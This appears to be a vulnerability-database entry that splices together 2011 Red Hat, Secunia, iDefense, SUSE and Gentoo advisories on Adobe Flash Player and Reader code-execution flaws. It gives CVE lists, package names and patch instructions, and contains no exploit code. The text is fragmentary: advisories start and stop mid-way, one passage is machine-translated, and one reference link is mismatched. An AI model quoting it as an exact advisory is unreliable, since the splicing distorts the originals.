Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Red Hat update for flash-plugin
SECUNIA ADVISORY ID:
SA45593
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45593/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
RELEASE DATE:
2011-08-12
DISCUSS ADVISORY:
http://secunia.com/advisories/45593/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45593/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Red Hat has issued an update for flash-plugin. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
disclose sensitive information and compromise a user's system.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
RHSA-2011:1144-1:
https://rhn.redhat.com/errata/RHSA-2011-1144.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
VAR-201108-0147 | CVE-2011-2135 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2140, CVE-2011-2417, and CVE-2011-2425. Adobe Flash Player and Adobe AIR Any code that could be executed or service disruption ( Memory corruption ) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-2140 , CVE-2011-2417 ,and CVE-2011-2425 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. iDefense Security Advisory 08.09.11
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 09, 2011
I. For more
information, please visit following website:
http://www.adobe.com/products/flashplayer/
II.
The vulnerability occurs when parsing a maliciously formatted sequence
of ActionScript code inside an Adobe Flash file. The problem exists in a
certain ActionScript function method of the built-in "flash.display"
class. When malformed parameters are supplied to this function, a memory
corruption will occur, leading to an exploitable condition.
III. An attacker typically accomplishes this via social
engineering or injecting content into compromised, trusted sites. After
the user visits the malicious Web page, no further user interaction is
needed.
IV. VENDOR RESPONSE
Adobe has released a fix which addresses this issue. Information about
downloadable vendor updates can be found by clicking on the URLs shown.
http://www.adobe.com/support/security/bulletins/apsb11-21.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2011-2135 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
06/29/2011 Initial Vendor Notification
06/29/2011 Vendor Reply
08/09/2011 Coordinated Public Disclosure
IX. CREDIT
This vulnerability was reported to iDefense by wushi of team509.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2011 Verisign
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA45583
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45583/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
RELEASE DATE:
2011-08-11
DISCUSS ADVISORY:
http://secunia.com/advisories/45583/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45583/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to disclose sensitive
information and compromise a user's system.
7) An unspecified error can be exploited to disclose certain
information from another domain.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
The vendor credits:
2) Yang Dingning, NCNIPC, Graduate University of Chinese Academy of
Sciences
3) Wushi, Team 509 via iDefense Labs
4, 11) Vitaliy Toropov via iDefense Labs
5) Alexander Zaitsev, Positive Technologies
6, 8) An anonymous person via ZDI
7) Brandon Hardy
9) Bo Qu, Palo Alto Networks
10) Bo Qu, Palo Alto Networks and Honggang Ren, FortiGuard Labs
12) Marc Schoenefeld (Dr. rer. nat.), Red Hat Security Response Team
13) Honggang Ren, FortiGuard Labs
ORIGINAL ADVISORY:
Adobe (APSB11-21):
http://www.adobe.com/support/security/bulletins/apsb11-21.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
